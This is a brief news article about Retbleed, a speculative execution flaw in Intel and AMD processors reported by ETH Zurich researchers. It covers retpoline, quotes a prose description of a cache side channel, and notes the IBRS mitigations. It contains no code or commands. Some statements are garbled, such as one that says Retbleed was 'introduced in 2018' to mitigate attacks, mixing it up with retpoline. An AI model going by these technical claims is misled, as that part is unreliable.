- Researchers at ETH Zurich discovered a serious hardware speculative execution attack in Intel and AMD microprocessors, affecting all Linux operating systems that use the affected chips.
- Retbleed targets a safeguard known as retpoline. The goal of a retpoline sequence is to control how the CPU performs speculation when executing “jmp” and “call”.
- Retlbleed predicts the next instruction and automatically executes it before the instruction is confirmed.
Researchers at ETH Zurich have uncovered a serious hardware vulnerability in some Intel and AMD microprocessors, addressing all Linux operating systems that use the affected chips. The attacks are causing to ignore current system defenses and can be used to extract sensitive information. The attack is named Retbleed because it targets a software defense known as retpoline.
Retlbleed predicts the next instruction
Retbleed was introduced in 2018 to mitigate the hurtful effects of speculative execution attacks. The attacks include one known as Spectre that exploits CPUs and encounters a direct or indirect instruction branch. It predicts the address for the next instruction and automatically executes it before the prediction is confirmed.
According to the researchers, Retbleed mitigations demand extensive changes to the system resulting in performance loss for affected AMD and Intel CPUs respectively. One of the methods of leak information from CPU caches as stated by researchers;
« The spy first fills up an entire cache set with their own memory. They then trigger or wait for, some victim activity to occur that might be significant for the given cache set. In the last step, the spy then reloads their own memory while measuring the access time. If the access time is above a computed threshold, the spy infers that the cache set was populated with the victim’s memory, which consequentially evicted some of the spy’s memory from the cache. »
The issue is tracked as CVE-2022-29900 (AMD) and CVE-2022-29901 (Intel) and reported to the related companies. Intel published a security advisory urging users to use Indirect Branch Restricted Speculation (IBRS) instead of retpoline as a response to this potential vulnerability. AMD also issued guidance and recommended mitigations for the use of the Indirect Branch Restricted Speculation (IBRS) mode or the use of ‘retpoline’.
For this study, the academics built an analysis framework on top of Linux testing to trace facilities and developed a proof of concept (PoC) for Linux OS. The researchers also published a video that shows how Retbleed can perform to leak kernel memory on Intel and AMD processors: